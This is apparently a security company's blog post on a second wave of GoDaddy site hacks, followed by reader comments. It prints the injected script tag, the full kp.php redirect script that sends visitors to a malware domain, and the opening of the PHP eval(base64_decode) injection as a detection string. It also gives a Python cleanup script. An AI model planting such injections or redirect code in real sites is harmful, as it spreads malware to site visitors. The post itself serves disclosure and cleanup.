
Second round of GoDaddy sites hacked

It seems that a second round of attacks is happening today at GoDaddy, infecting all kinds of sites (Joomla, WordPress, etc.). Judging by the modification dates on the files, the changes all happened on May 1st (today), during the morning from 1 to 3/4 am.

All of them had the following javascript added to their pages:

script src= http://kdjkfjskdfjlskdjf.com/kp.php

Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.

This is what the kp.php file looks like:

function setCookie(c_name, value, expiredays)
{
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + expiredays);
    document.cookie = c_name + "=" + escape(value) +
        ((expiredays == null) ? "" : ";expires=" + exdate.toGMTString());
}

function getCookie(c_name)
{
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(c_name + "=");
        if (c_start != -1) {
            c_start = c_start + c_name.length + 1;
            c_end = document.cookie.indexOf(";", c_start);
            if (c_end == -1) c_end = document.cookie.length;
            return unescape(document.cookie.substring(c_start, c_end));
        }
    }
    return "";
}

// The cookie marks browsers that were already redirected, so each visitor is sent to the malware URL only once.
var name = getCookie("pma_visited_theme1");
if (name == "") {
    setCookie("pma_visited_theme1", "1", 20);
    var url = "http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D";
    window.top.location.replace(url);
} else { }

As you can see, very similar to the previous attack, also loading malware from this *.xorg.pl domain…

If your site got hacked, open your index files and look for this string at the top of each one:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ2..

Removing that from all your index files should solve the problem.

If you are using WordPress, all the *.php files inside your themes folder got modified. So, you have to clean them too.
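One way to run the cleanup described above over the index files and the theme folders in a single pass (an added example, not code from the original post or from Sucuri). The names INJECTED, strip_injection, clean_tree and demo are hypothetical, the sample files are constructed, and the code assumes the injected block is closed by "?>" before the site's own code begins:

```python
import os
import re
import tempfile

# Signature from the post: "<?php /**/ eval(base64_decode(" at the very top of a file.
# ASSUMPTION (not from the post): the injected block ends with "?>" before the
# site's own code. Check one infected file by hand before running with apply=True.
INJECTED = re.compile(
    rb'\A\s*<\?php\s*/\*\*/\s*eval\(base64_decode\(\s*["\'][A-Za-z0-9+/=\s]+["\']'
    rb'\s*\)\s*\)\s*;?\s*\?>')

def strip_injection(data):
    """Return (cleaned_bytes, was_infected) for one file's contents."""
    m = INJECTED.match(data)
    return (data[m.end():], True) if m else (data, False)

def clean_tree(root, apply=False):
    """List infected *.php files under root; rewrite them only if apply=True."""
    infected = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            cleaned, hit = strip_injection(data)
            if not hit:
                continue
            infected.append(path)
            if apply:
                os.replace(path, path + ".infected")  # keep a copy; move it out of the web root
                with open(path, "wb") as fh:
                    fh.write(cleaned)
    return sorted(infected)

def demo():
    """Constructed sample tree: one infected index.php, one clean theme file."""
    bad = b'<?php /**/ eval(base64_decode("Y29uc3RydWN0ZWQ="));?>'  # constructed, inert
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "themes"))
        with open(os.path.join(root, "index.php"), "wb") as fh:
            fh.write(bad + b"<?php echo 'home'; ?>\n")
        with open(os.path.join(root, "themes", "header.php"), "wb") as fh:
            fh.write(b"<?php echo 'header'; ?>\n")
        hits = clean_tree(root, apply=True)
        with open(os.path.join(root, "index.php"), "rb") as fh:
            return [os.path.relpath(h, root) for h in hits], fh.read()
```

Run clean_tree(root) first with the default apply=False to get the list of affected files, and only rewrite them once that list looks right.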

UPDATE 1 – People are starting to complain on the WordPress forums: http://wordpress.org/support/topic/394255.

UPDATE 2tweeted about it saying that it is related only to WordPress. It is affecting all platforms there.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.


54 Responses to Second round of GoDaddy sites hacked

  1. Singha says:

    I'm on Bluehost, and have two tikiwiki sites and two drupal sites that have this same hack. The fix from Sucuri here has not helped at all. Anybody have any idea what I can do to get my sites back online?

  2. Singha:

    Can you send me your site name? I will take a look for you.

  3. Anonymous says:

    I've removed wordpress completely and it's still hacking my site once a month or so. Ahhhhhhhh
